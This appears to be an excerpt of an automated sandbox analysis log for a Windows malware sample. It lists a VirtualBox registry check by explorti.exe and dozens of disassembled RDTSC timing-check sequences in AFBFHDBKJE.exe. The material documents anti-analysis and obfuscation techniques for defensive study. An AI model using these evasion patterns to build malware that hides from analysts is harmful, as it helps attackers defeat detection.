Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DD23D second address: 2DD245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2CC2B2 second address: 2CC2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2CC2B8 second address: 2CC2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DC3D9 second address: 2DC3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB18 second address: 2DCB1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB1F second address: 2DCB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDD3F1872h 0x00000010 jno 00007F7FDD3F186Ch 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB48 second address: 2DCB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2DCB4E second address: 2DCB54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E06DE second address: 2E06E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E06E4 second address: 2E06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0862 second address: 2E08EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, dword ptr [ebp+122D3A29h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F7FDCFD2298h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov si, 2734h 0x00000033 or dword ptr [ebp+122D19ACh], ebx 0x00000039 call 00007F7FDCFD2299h 0x0000003e jmp 00007F7FDCFD22A4h 0x00000043 push eax 0x00000044 jmp 00007F7FDCFD22A9h 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jbe 00007F7FDCFD2296h 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E08EA second address: 2E0909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7FDD3F1866h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0909 second address: 2E091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E091A second address: 2E09A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7FDD3F1871h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jno 00007F7FDD3F1884h 0x00000015 pop eax 0x00000016 mov esi, dword ptr [ebp+122D3157h] 0x0000001c add dword ptr [ebp+122D3351h], ebx 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F7FDD3F1868h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D313Eh], eax 0x00000046 mov dword ptr [ebp+122D31D5h], esi 0x0000004c push 00000003h 0x0000004e cmc 0x0000004f push 9C94E584h 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 push edx 0x00000058 pop edx 0x00000059 pop ecx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E09A1 second address: 2E09CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F7FDCFD2296h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 5C94E584h 0x00000013 lea ebx, dword ptr [ebp+124555ABh] 0x00000019 sub ecx, 4AC77F77h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7FDCFD229Bh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E09CE second address: 2E09F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F7FDD3F1879h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7FDD3F186Bh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0A5E second address: 2E0A68 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0A68 second address: 2E0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF426 second address: 2FF432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF432 second address: 2FF445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7FDD3F186Bh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF445 second address: 2FF44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF44A second address: 2FF450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF450 second address: 2FF462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F7FDCFD2296h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF462 second address: 2FF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF5CE second address: 2FF5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD2296h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF89A second address: 2FF8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF8A0 second address: 2FF8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF8A4 second address: 2FF8D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jp 00007F7FDD3F186Ch 0x00000011 jp 00007F7FDD3F1866h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFB42 second address: 2FFB48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFDE1 second address: 2FFDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7FDD3F1866h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F7FDD3F186Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFF40 second address: 2FFF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7FDCFD2296h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFF52 second address: 2FFF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jg 00007F7FDD3F1879h 0x0000000f jmp 00007F7FDD3F186Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3000C1 second address: 3000C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3003BC second address: 3003D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E21 second address: 2F3E42 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDCFD2298h 0x00000008 jl 00007F7FDCFD229Ch 0x0000000e jo 00007F7FDCFD2296h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F7FDCFD2296h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E42 second address: 2F3E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E46 second address: 2F3E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E50 second address: 2F3E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C0A second address: 300C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7FDCFD229Bh 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 jmp 00007F7FDCFD22A2h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C4B second address: 300C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C4F second address: 300C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300DA0 second address: 300DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300DA6 second address: 300DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301077 second address: 30107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30107B second address: 301094 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7FDCFD2296h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F7FDCFD2298h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301094 second address: 301098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301098 second address: 30109C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3084BA second address: 3084C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3084C0 second address: 3084C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30867D second address: 3086BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7FDD3F1868h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jl 00007F7FDD3F186Eh 0x00000013 jl 00007F7FDD3F1868h 0x00000019 pushad 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F7FDD3F1878h 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307520 second address: 307524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307524 second address: 307543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7FDD3F1875h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307543 second address: 307548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30DA65 second address: 30DA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F7FDD3F1866h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DD6 second address: 2D2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DE3 second address: 2D2DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DE7 second address: 2D2DF1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30D37C second address: 30D380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30D7D0 second address: 30D7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3105B8 second address: 3105F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1872h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7FDD3F1875h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3105F0 second address: 310601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310601 second address: 310660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F7FDD3F186Ch 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 jmp 00007F7FDD3F1874h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 js 00007F7FDD3F1873h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310A9A second address: 310AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A6h 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F7FDCFD22B5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7FDCFD22A3h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310BF8 second address: 310BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3112A8 second address: 3112AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 311366 second address: 31136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 311430 second address: 311435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3114D0 second address: 3114E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F1873h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31371D second address: 31372F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD229Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3141A9 second address: 3141AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316E43 second address: 316EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7FDCFD229Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D2273h] 0x00000018 jbe 00007F7FDCFD22AEh 0x0000001e jmp 00007F7FDCFD22A8h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F7FDCFD2298h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f call 00007F7FDCFD22A0h 0x00000044 pop edi 0x00000045 pushad 0x00000046 adc esi, 3CBBE3E1h 0x0000004c mov dword ptr [ebp+122D19FFh], edi 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push edi 0x00000055 pushad 0x00000056 jmp 00007F7FDCFD22A8h 0x0000005b push eax 0x0000005c pop eax 0x0000005d popad 0x0000005e pop edi 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316EF1 second address: 316EFB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 319484 second address: 31948E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 319A6E second address: 319B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+124533DCh], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F7FDD3F1868h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F7FDD3F1868h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2B5Bh], ecx 0x0000004e mov ebx, dword ptr [ebp+122D3C81h] 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 jmp 00007F7FDD3F1873h 0x0000005b jmp 00007F7FDD3F186Ch 0x00000060 popad 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F7FDD3F1876h 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB32 second address: 31AB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
